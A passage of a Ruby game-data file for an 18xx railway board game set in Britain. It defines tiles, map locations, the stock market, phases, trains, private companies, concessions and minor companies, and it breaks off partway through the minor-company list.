STARTING_CASH = { 3 => 700, 4 => 525, 5 => 420, 6 => 350, 7 => 300 }.freeze
CAPITALIZATION = :incremental
MUST_SELL_IN_BLOCKS = false
TILES = {
'1' => 1,
'2' => 1,
'3' => 6,
'4' => 6,
'5' => 6,
'6' => 8,
'7' => 'unlimited',
'8' => 'unlimited',
'9' => 'unlimited',
'55' => 1,
'56' => 1,
'57' => 6,
'58' => 6,
'69' => 1,
'14' => 6,
'15' => 6,
'80' => 6,
'81' => 6,
'82' => 8,
'83' => 8,
'141' => 4,
'142' => 4,
'143' => 4,
'144' => 4,
'207' => 2,
'208' => 1,
'619' => 6,
'622' => 1,
'63' => 8,
'544' => 6,
'545' => 6,
'546' => 8,
'611' => 4,
'60' => 2,
'X20' =>
{
'count' => 1,
'color' => 'yellow',
'code' =>
'city=revenue:40;city=revenue:40;city=revenue:40;city=revenue:40;city=revenue:40;city=revenue:40;'\
'path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;path=a:5,b:_5;'\
'upgrade=cost:20;label=L',
},
'405' =>
{
'count' => 3,
'color' => 'green',
'code' => 'city=revenue:40,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:5,b:_0;label=T',
},
'X1' =>
{
'count' => 1,
'color' => 'green',
'code' =>
'city=revenue:30,slots:3;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;label=C',
},
'X2' =>
{
'count' => 2,
'color' => 'green',
'code' =>
'city=revenue:50,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;'\
'path=a:4,b:_0;label=BM',
},
'X3' =>
{
'count' => 1,
'color' => 'green',
'code' =>
'city=revenue:30,slots:2;path=a:1,b:_0;path=a:4,b:_0;label=S',
},
'X4' =>
{
'count' => 1,
'color' => 'green',
'code' =>
'city=revenue:0;path=a:2,b:_0;path=a:3,b:_0;path=a:5,b:_0;upgrade=cost:100;label=EC',
},
'X21' =>
{
'count' => 1,
'color' => 'green',
'code' =>
'city=revenue:60;city=revenue:60;city=revenue:60;city=revenue:60;city=revenue:60;city=revenue:60;'\
'path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;path=a:5,b:_5;'\
'upgrade=cost:20;label=L',
},
'145' =>
{
'count' => 4,
'color' => 'brown',
'code' =>
'town=revenue:10;path=a:0,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:5,b:_0',
},
'146' =>
{
'count' => 4,
'color' => 'brown',
'code' =>
'town=revenue:10;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0',
},
'147' =>
{
'count' => 6,
'color' => 'brown',
'code' =>
'town=revenue:10;path=a:0,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0',
},
'X5' =>
{
'count' => 3,
'color' => 'brown',
'code' =>
'city=revenue:50,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;'\
'path=a:4,b:_0;label=Y',
},
'X6' =>
{
'count' => 1,
'color' => 'brown',
'code' =>
'city=revenue:50,slots:3;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;label=C',
},
'X7' =>
{
'count' => 2,
'color' => 'brown',
'code' =>
'city=revenue:60,slots:4;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;'\
'path=a:5,b:_0;label=BM',
},
'X8' =>
{
'count' => 1,
'color' => 'brown',
'code' =>
'city=revenue:40,slots:2;path=a:1,b:_0;path=a:4,b:_0;label=S',
},
'X9' =>
{
'count' => 1,
'color' => 'brown',
'code' =>
'city=revenue:0,slots:2;path=a:2,b:_0;path=a:3,b:_0;path=a:5,b:_0,lanes:2;upgrade=cost:100;label=EC',
},
'X10' =>
{
'count' => 3,
'color' => 'brown',
'code' =>
'city=revenue:50,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:5,b:_0;label=T',
},
'X22' =>
{
'count' => 1,
'color' => 'brown',
'code' =>
'city=revenue:80;city=revenue:80;city=revenue:80;city=revenue:80;city=revenue:80;city=revenue:80;'\
'path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;path=a:5,b:_5;'\
'upgrade=cost:20;label=L',
},
'169' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'junction;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0',
},
'X11' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'city=revenue:60,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;label=Y',
},
'X12' =>
{
'count' => 1,
'color' => 'gray',
'code' =>
'city=revenue:60,slots:3;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;label=C',
},
'X13' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'city=revenue:80,slots:4;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;'\
'path=a:5,b:_0;label=BM',
},
'X14' =>
{
'count' => 1,
'color' => 'gray',
'code' =>
'city=revenue:60,slots:2;path=a:1,b:_0;path=a:4,b:_0;label=S',
},
'X15' =>
{
'count' => 1,
'color' => 'gray',
'code' =>
'city=revenue:0,slots:3;path=a:2,b:_0;path=a:3,b:_0;path=a:5,b:_0,lanes:2;label=EC',
},
'X16' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'city=revenue:60,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:5,b:_0;label=T',
},
'X17' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'town=revenue:10;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;path=a:5,b:_0',
},
'X18' =>
{
'count' => 2,
'color' => 'gray',
'code' =>
'city=revenue:50,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0',
},
'X19' =>
{
'count' => 4,
'color' => 'gray',
'code' =>
'city=revenue:50,slots:3;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;path=a:4,b:_0;'\
'path=a:5,b:_0',
},
'X23' =>
{
'count' => 1,
'color' => 'gray',
'code' =>
'city=revenue:100;city=revenue:100;city=revenue:100;city=revenue:100;city=revenue:100;'\
'city=revenue:100;path=a:0,b:_0;path=a:1,b:_1;path=a:2,b:_2;path=a:3,b:_3;path=a:4,b:_4;'\
'path=a:5,b:_5;label=L',
},
}.freeze
LOCATION_NAMES = {
'A42' => 'Cornwall',
'B43' => 'Plymouth',
'C34' => 'Fishguard',
'C38' => 'Barnstaple',
'D11' => 'Stranraer',
'D35' => 'Swansea & Oystermouth',
'D41' => 'Exeter',
'E2' => 'Highlands',
'E6' => 'Glasgow',
'E28' => 'Mid Wales',
'E32' => 'Merthyr Tydfil & Pontypool',
'E40' => 'Taunton',
'F3' => 'Stirling',
'F5' => 'Castlecary',
'F7' => 'Hamilton & Coatbridge',
'F11' => 'Dumfries',
'F23' => 'Holyhead',
'F35' => 'Cardiff',
'G4' => 'Falkirk',
'G12' => 'Carlisle',
'G16' => 'Barrow',
'G20' => 'Blackpool',
'G22' => 'Liverpool',
'G24' => 'Chester',
'G28' => 'Shrewbury',
'G32' => 'Hereford',
'G34' => 'Newport',
'G36' => 'Bristol',
'G42' => 'Dorehester',
'H1' => 'Aberdeen',
'H3' => 'Dunfermline',
'H5' => 'Edinburgh',
'H13' => 'Penrith',
'H17' => 'Lancaster',
'H19' => 'Preston',
'H21' => 'Wigan & Bolton',
'H23' => 'Warrington',
'H25' => 'Crewe',
'H33' => 'Gloucester',
'H37' => 'Bath & Radstock',
'I22' => 'Manchester',
'I26' => 'Stoke-on-Trent',
'I30' => 'Birmingham',
'I40' => 'Salisbury',
'I42' => 'Bournemouth',
'J15' => 'Darlington',
'J21' => 'Bradford',
'J29' => 'Derby',
'J31' => 'Coventry',
'J41' => 'Southamton',
'K10' => 'Newcastle',
'K12' => 'Durham',
'K14' => 'Middlesbrough',
'K20' => 'Leeds',
'K24' => 'Sheffield',
'K28' => 'Nottingham',
'K30' => 'Leicester',
'K36' => 'Oxford',
'K38' => 'Reading',
'K42' => 'Portsmouth',
'L19' => 'York',
'L33' => 'Northamton',
'M16' => 'Scarborough',
'M26' => 'Lincoln',
'M30' => 'Peterborough',
'M36' => 'Hertford',
'M38' => 'London',
'M42' => 'Brighton',
'N21' => 'Hull',
'N23' => 'Grimsby',
'N33' => 'Cambridge',
'O30' => "King's Lynn",
'O36' => 'Colchester',
'O40' => 'Maidstone',
'O42' => 'Folkstone',
'P35' => 'Ipswich',
'P39' => 'Canterbury',
'P41' => 'Dover',
'P43' => 'English Channel',
'Q44' => 'France',
}.freeze
MARKET = [
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '550', '600', '650', '700e'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '330', '360', '400', '450', '500', '550', '600', '650'],
['', '', '', '', '', '', '', '', '', '200', '220', '245', '270', '300', '330', '360', '400', '450', '500',
'550', '600'],
%w[70 80 90 100 110 120 135 150 165 180 200 220 245 270 300 330 360 400 450 500 550],
%w[60 70 80 90 100px 110 120 135 150 165 180 200 220 245 270 300 330 360 400 450 500],
%w[50 60 70 80 90px 100 110 120 135 150 165 180 200 220 245 270 300 330],
%w[45y 50 60 70 80px 90 100 110 120 135 150 165 180 200 220 245],
%w[40y 45y 50 60 70px 80 90 100 110 120 135 150 165 180],
%w[35y 40y 45y 50 60px 70 80 90 100 110 120 135],
%w[30y 35y 40y 45y 50p 60 70 80 90 100],
%w[25y 30y 35y 40y 45y 50 60 70 80],
%w[20y 25y 30y 35y 40y 45y 50y 60y],
%w[15y 20y 25y 30y 35y 40y 45y],
%w[10y 15y 20y 25y 30y 35y],
%w[5y 10y 15y 20y 25y],
].freeze
PHASES = [
{
name: '1',
on: '',
train_limit: { minor: 2, major: 4 },
tiles: [:yellow],
operating_rounds: 1,
},
{
name: '2',
on: %w[2 3],
train_limit: { minor: 2, major: 4 },
tiles: [:yellow],
status: ['can_convert_concessions'],
operating_rounds: 2,
},
{
name: '3',
on: '3',
train_limit: { minor: 2, major: 4 },
tiles: %i[yellow green],
status: %w[can_buy_trains can_convert_concessions],
operating_rounds: 2,
},
{
name: '4',
on: '4',
train_limit: { minor: 1, major: 3 },
tiles: %i[yellow green],
status: %w[can_buy_trains can_convert_concessions],
operating_rounds: 2,
},
{
name: '5',
on: '5',
train_limit: { minor: 1, major: 2 },
tiles: %i[yellow green brown],
status: %w[can_buy_trains
can_acquire_minor_bidbox
can_par
minors_green_upgrade],
operating_rounds: 2,
},
{
name: '6',
on: '6',
train_limit: { minor: 1, major: 2 },
tiles: %i[yellow green brown],
status: %w[can_buy_trains
can_acquire_minor_bidbox
can_par
full_capitalisation
minors_green_upgrade],
operating_rounds: 2,
},
{
name: '7',
on: '7',
train_limit: { minor: 1, major: 2 },
tiles: %i[yellow green brown gray],
status: %w[can_buy_trains
can_acquire_minor_bidbox
can_par
full_capitalisation
minors_green_upgrade],
operating_rounds: 2,
},
].freeze
TRAINS = [
{
name: 'L',
distance: [
{
'nodes' => ['city'],
'pay' => 1,
'visit' => 1,
},
{
'nodes' => ['town'],
'pay' => 1,
'visit' => 1,
},
],
num: 22,
price: 60,
rusts_on: '3',
variants: [
{
name: '2',
distance: 2,
price: 120,
rusts_on: '4',
available_on: '1',
},
],
},
{
name: '3',
distance: 3,
num: 9,
price: 200,
rusts_on: '6',
},
{
name: '4',
distance: 4,
num: 6,
price: 300,
rusts_on: '7',
},
{
name: '5',
distance: 5,
num: 5,
price: 500,
events: [
{
'type' => 'close_concessions',
},
],
},
{
name: '6',
distance: 6,
num: 3,
price: 600,
events: [
{
'type' => 'full_capitalisation',
},
],
},
{
name: '7',
distance: 7,
num: 20,
price: 750,
variants: [
{
name: 'E',
distance: [
{
'nodes' => %w[city offboard],
'pay' => 99,
'visit' => 99,
'multiplier' => 2,
},
{
'nodes' => ['town'],
'pay' => 0,
'visit' => 99,
},
],
price: 1000,
},
],
},
{
name: '2P',
distance: 2,
num: 2,
price: 0,
},
{
name: '5P',
distance: 5,
num: 1,
price: 0,
},
{
name: 'P+',
distance: [
{
'nodes' => ['city'],
'pay' => 99,
'visit' => 99,
},
{
'nodes' => ['town'],
'pay' => 99,
'visit' => 99,
},
],
num: 2,
price: 0,
},
].freeze
COMPANIES = [
{
name: 'Butterley Engineering Company',
sym: 'P1',
value: 0,
revenue: 5,
desc: 'MAJOR, Phase 5. 5-Train. This is a normal 5-train that is subject to all of the normal rules. '\
'Note that a company can acquire this private company at the start of its turn, even if it is '\
'already at its train limit as this counts as an acquisition action, not a train buying action. '\
'However, once acquired the acquiring company needs to check whether it is at train limit and '\
'discard any trains held in excess of limit.',
abilities: [],
color: nil,
},
{
name: 'Middleton Railway',
sym: 'P2',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 2. Remove Small Station. NO LAY TRACK CHECK. Make sure the laid track is '\
'valid. Allows the owning company to place a plain yellow track tile directly on an undeveloped '\
'small station hex location or upgrade a small station tile of one colour to a plain track tile '\
'of the next colour. This closes the company and counts as the company’s normal track laying '\
'step. All other normal track laying restrictions apply. Once acquired, the private company pays '\
'its revenue to the owning company until the power is exercised and the company is closed.',
abilities: [
{
type: 'tile_lay',
owner_type: 'corporation',
when: 'track',
count: 1,
reachable: true,
closed_when_used_up: true,
hexes: [],
tiles: %w[7 8 9 80 81 82 83 544 545 546 60 169],
},
],
color: nil,
},
{
name: 'Shrewsbury and Hereford Railway',
sym: 'P3',
value: 0,
revenue: 0,
desc: 'MAJOR, Phase 2. Permanent 2-Train. 2P-train is a permanent 2-train. It can’t be sold to another '\
'company. It does not count against train limit. It does not count as a train for the purpose of '\
'mandatory train ownership and purchase. A company may not own more than one 2P train. Dividends '\
'can be separated from other trains and may be split, paid in full, or retained. If a company '\
'runs a 2P-train and pays a dividend (split or full), but retains its dividend from other train '\
'operations this still counts as a normal dividend for stock price movement purposes. Vice-versa, '\
'if a company pays a dividend (split or full) with its other trains, but retains the dividend '\
'from the 2P, this also still counts as a normal dividend for stock price movement purposes. Does '\
'not close.',
abilities: [],
color: nil,
},
{
name: 'South Devon Railway',
sym: 'P4',
value: 0,
revenue: 0,
desc: 'MAJOR, Phase 2. Permanent 2-Train. 2P-train is a permanent 2-train. It can’t be sold to another '\
'company. It does not count against train limit. It does not count as a train for the purpose of '\
'mandatory train ownership and purchase. A company may not own more than one 2P train. Dividends '\
'can be separated from other trains and may be split, paid in full, or retained. If a company '\
'runs a 2P-train and pays a dividend (split or full), but retains its dividend from other train '\
'operations this still counts as a normal dividend for stock price movement purposes. Vice-versa, '\
'if a company pays a dividend (split or full) with its other trains, but retains the dividend '\
'from the 2P, this also still counts as a normal dividend for stock price movement purposes. '\
'Does not close.',
abilities: [],
color: nil,
},
{
name: 'London, Chatham and Dover Railway',
sym: 'P5',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 3. English Channel. The owning company may place an exchange station token on the '\
'map, free of charge, in a token space in the English Channel. The company does not need to be '\
'able to trace a route to the English Channel to use this property (i.e. any company can use this '\
'power to place a token in the English Channel). If no token spaces are available, but a space '\
'could be created by upgrading the English Channel track then this power may be used to place a '\
'token and upgrade the track simultaneously. This counts as the acquiring company’s tile lay '\
'action and incurs the usual costs for doing so. Alternatively, it can move an exchange station '\
'token to the available station token section on its company charter.',
abilities: [],
color: nil,
},
{
name: 'Leeds & Selby Railway',
sym: 'P6',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 3. Mail Contract. After running trains, the owning company receives income into its '\
'treasury equal to one half of the base value of the start and end stations from one of the '\
'trains operated. Doubled values (for E trains or destination tokens) do not count. The company '\
'is not required to maximise the dividend from its run if it wishes to maximise its revenue from '\
'the mail contract by stopping at a large city and not running beyond it to include small '\
'stations. Does not close.',
abilities: [],
color: nil,
},
{
name: 'Shrewsbury and Birmingham Railway',
sym: 'P7',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 3. Mail Contract. After running trains, the owning company receives income into its '\
'treasury equal to one half of the base value of the start and end stations from one of the '\
'trains operated. Doubled values (for E trains or destination tokens) do not count. The company '\
'is not required to maximise the dividend from its run if it wishes to maximise its revenue from '\
'the mail contract by stopping at a large city and not running beyond it to include small '\
'stations. Does not close.',
abilities: [],
color: nil,
},
{
name: 'Edinburgh and Glasgow Railway',
sym: 'P8',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 3. Mountain/Hill Discount. Either: The acquiring company receives a discount '\
'token that can be used to pay the full cost of a single track tile lay on a rough terrain, hill '\
'or mountain hex. This closes the company. Or: The acquiring company rejects the token and '\
'receives a £20 discount off the cost of all hill and mountain terrain (i.e. NOT off the cost of '\
'rough terrain). The private company does not close. Closes if free token taken when acquired. '\
'Otherwise, flips when acquired and does not close.',
abilities: [],
color: nil,
},
{
name: 'Midland and Great Northern Joint Railway',
sym: 'P9',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 3. Declare 2x Cash Holding. If held by a player, the holding player may '\
'declare double their actual cash holding at the end of a stock round to determine player turn '\
'order in the next stock round. If held by a company it pays revenue of '\
'£20 (green)/£40 (brown)/£60 (grey). Does not close.',
abilities: [],
color: nil,
},
{
name: 'Glasgow and South- Western Railway',
sym: 'P10',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 3. River/Estuary Discount. The acquiring company receives two discount tokens '\
'each of which can be used to pay the cost for one track lay over an estuary crossing. They can '\
'be used on the same or different tile lays. Use of the second token closes the company. In '\
'addition, until the company closes it provides a discount of £10 against the cost of all river '\
'terrain (excluding estuary crossings).',
abilities: [
{
type: 'tile_lay',
owner_type: 'corporation',
when: 'track',
count: 2,
reachable: true,
closed_when_used_up: true,
hexes: [],
tiles: [],
},
{
type: 'tile_discount',
owner_type: 'corporation',
discount: 10,
terrain: 'swamp',
},
],
color: nil,
},
{
name: 'Bristol & Exeter Railway',
sym: 'P11',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 2. Advanced Tile Lay. The owning company may lay one plain or small station '\
'track upgrade using the next colour of track to be available, before it is actually made '\
'available by phase progression. The normal rules for progression of track lay must be followed '\
'(i.e. grey upgrades brown upgrades green upgrades yellow) it is not possible to skip a colour '\
'using this private. All other normal track laying restrictions apply. This is in place of its '\
'normal track lay action. Once acquired, the private company pays its revenue to the owning '\
'company until the power is exercised and the company closes.',
abilities: [
{
type: 'tile_lay',
owner_type: 'corporation',
when: 'track',
count: 1,
reachable: true,
closed_when_used_up: true,
hexes: [],
tiles: %w[80 81 82 83 544 545 546 60 169 141 142 143 144 145 146 147 X17],
},
],
color: nil,
},
{
name: 'Leicester & Swannington Railway',
sym: 'P12',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 3. Extra Tile Lay. The owning company may lay an additional yellow tile (or '\
'two for major companies), or make one additional tile upgrade in its track laying step. The '\
'upgrade can be to a tile laid in its normal tile laying step. All other normal track laying '\
'restrictions apply. Once acquired, the private company pays its revenue to the owning company '\
'until the power is exercised and the company closes.',
abilities: [
{
type: 'tile_lay',
owner_type: 'corporation',
when: 'track',
count: 2,
reachable: true,
closed_when_used_up: true,
hexes: [],
tiles: [],
},
],
color: nil,
},
{
name: 'York, Newcastle and Berwick Railway',
sym: 'P13',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 5. Pullman. A “Pullman” carriage train that can be added to another train '\
'owned by the company. It converts the train into a + train. Does not count against train limit '\
'and does not count as a train for the purposes of train ownership. Can’t be sold to another '\
'company. Does not close.',
abilities: [],
color: nil,
},
{
name: 'Kilmarnock and Troon Railway',
sym: 'P14',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 5. Pullman. A “Pullman” carriage train that can be added to another train '\
'owned by the company. It converts the train into a + train. Does not count against train limit '\
'and does not count as a train for the purposes of train ownership. Can’t be sold to another '\
'company. Does not close.',
abilities: [],
color: nil,
},
{
name: 'Highland Railway',
sym: 'P15',
value: 0,
revenue: 0,
desc: 'MAJOR/MINOR, Phase 2. £10x Phase. Pays revenue of £10 x phase number to the player, and pays '\
'treasury credits of £10 x phase number to the private company. This credit is retained on the '\
'private company charter. When acquired, the acquiring company receives this treasury money and '\
'this private company closes. If not acquired beforehand, this company closes at the start of '\
'Phase 7 and all treasury credits are returned to the bank.',
abilities: [],
color: nil,
},
{
name: 'Off-Shore Tax Haven',
sym: 'P16',
value: 0,
revenue: 0,
desc: 'CAN NOT BE AQUIRED. Tax Haven. As a stock round action, under the direction and funded by the '\
'owning player, the off-shore Tax Haven may purchase an available share certificate and place it '\
'onto P16’s charter. The certificate is not counted for determining directorship of a company. '\
'The share held in the tax haven does NOT count against the 60% share limit for purchasing '\
'shares. If at 60% (or more) in hand in a company, a player can still purchase an additional '\
'share in that company and place it in the tax haven. Similarly, if a player holds 50% of a '\
'company, plus has 10% of the same company in the tax haven, they can buy a further 10% share. '\
'A company with a share in the off-shore tax haven CAN be “all sold out” at the end of a stock '\
'round. Dividends paid to the share are also placed onto the off-shore tax haven charter. At the '\
'end of the game, the player receives the share certificate from the off-shore tax haven charter '\
'and includes it in their portfolio for determining final worth. The player also receives the '\
'cash from dividend income accumulated on the charter. Can’t be acquired. Does not count against '\
'the certificate limit.',
abilities: [],
color: nil,
},
{
name: 'Lancashire Union Railway',
sym: 'P17',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 2. Move Card. Allows the director of the owning company to select one concession, '\
'private company, or minor company from the relevant stack of certificates, excluding those items '\
'currently in the bidding boxes, and move it to the top or the bottom of the stack. Closes when '\
'the power is exercised.',
abilities: [],
color: nil,
},
{
name: 'Cromford Union and High Peak Railway',
sym: 'P18',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 5. Station Marker Swap. Allows the owning company to move a token from the exchange '\
'token area of its charter to the available token area, or vice versa. This company closes when '\
'its power is exercised.',
abilities: [],
color: nil,
},
{
name: 'CONCESSION: London and North West Railway',
sym: 'C1',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and converts into the LNWR’s 10% director certificate. LNWR may also put '\
'it’s destination token into Manchester when converted.',
abilities: [
{
type: 'exchange',
corporations: ['LNWR'],
owner_type: 'player',
from: 'par',
},
],
color: '#000',
text_color: 'white',
},
{
name: 'CONCESSION: Great Western Railway',
sym: 'C2',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the GWR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['GWR'],
owner_type: 'player',
from: 'par',
},
],
color: '#165016',
text_color: 'white',
},
{
name: 'CONCESSION: London, Brighton and South Coast Railway',
sym: 'C3',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the LBSCR director’s '\
'certificate.',
abilities: [
{
type: 'exchange',
corporations: ['LBSCR'],
owner_type: 'player',
from: 'par',
},
],
color: '#cccc00',
text_color: 'white',
},
{
name: 'CONCESSION: South Eastern & Chatham Railway',
sym: 'C4',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the SECR director’s '\
'certificate.',
abilities: [
{
type: 'exchange',
corporations: ['SECR'],
owner_type: 'player',
from: 'par',
},
],
color: '#ff7f2a',
text_color: 'white',
},
{
name: 'CONCESSION: Caledonian Railway',
sym: 'C5',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the CR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['CR'],
owner_type: 'player',
from: 'par',
},
],
color: '#5555ff',
text_color: 'white',
},
{
name: 'CONCESSION: Midland Railway',
sym: 'C6',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the MR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['MR'],
owner_type: 'player',
from: 'par',
},
],
color: '#ff2a2a',
text_color: 'white',
},
{
name: 'CONCESSION: Lancashire & Yorkshire',
sym: 'C7',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the LYR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['LYR'],
owner_type: 'player',
from: 'par',
},
],
color: '#2d0047',
text_color: 'white',
},
{
name: 'CONCESSION: North British Railway',
sym: 'C8',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the NBR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['NBR'],
owner_type: 'player',
from: 'par',
},
],
color: '#a05a2c',
text_color: 'white',
},
{
name: 'CONCESSION: South Wales Railway',
sym: 'C9',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the SWR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['SWR'],
owner_type: 'player',
from: 'par',
},
],
color: '#999999',
text_color: 'white',
},
{
name: 'CONCESSION: North Eastern Railway',
sym: 'C10',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the NER director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['NER'],
owner_type: 'player',
from: 'par',
},
],
color: '#aade87',
text_color: 'white',
},
{
name: 'MINOR: 1. Great North of Scotland Railway',
sym: 'M1',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is H1.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 2. Lanarkshire & Dumbartonshire Railway',
sym: 'M2',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is E2.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 3. Edinburgh & Dalkeith Railway',
sym: 'M3',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is H5.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 4. Newcastle & North shields Railway',
sym: 'M4',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is K10.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 5. Stockton and Darlington Railway',
sym: 'M5',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is J15.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 6. Furness railway',
sym: 'M6',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is G16.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 7. Warrington & Newton Railway',
sym: 'M7',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is H23.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 8. Manchester Sheffield & Lincolnshire Railway',
sym: 'M8',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is K24.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 9. East Lincolnshire Railway',
sym: 'M9',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is N23.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 10. Grand Junction Railway',
sym: 'M10',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is I30.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 11. Great Northern Railway',
sym: 'M11',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is M30.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 12. Eastern Union Railway',
sym: 'M12',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is P35.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 13. Headcorn & Maidstone Junction Light Railway',
sym: 'M13',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is O40.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 14. Metropolitan Railway',
sym: 'M14',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is M38.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 15. London Tilbury & Southend Railway',
sym: 'M15',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is M38.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 16. Wycombe Railway',
sym: 'M16',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is M38.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 17. London & Southampton Railway',
sym: 'M17',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is J41.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 18. Somerset & Dorset Joint Railway',
sym: 'M18',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is I42.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 19. Penarth Harbour & Dock Railway Company',
sym: 'M19',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is F35.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 20. Monmouthshire Railway & Canal Company',
sym: 'M20',
value: 100,
revenue: 0,
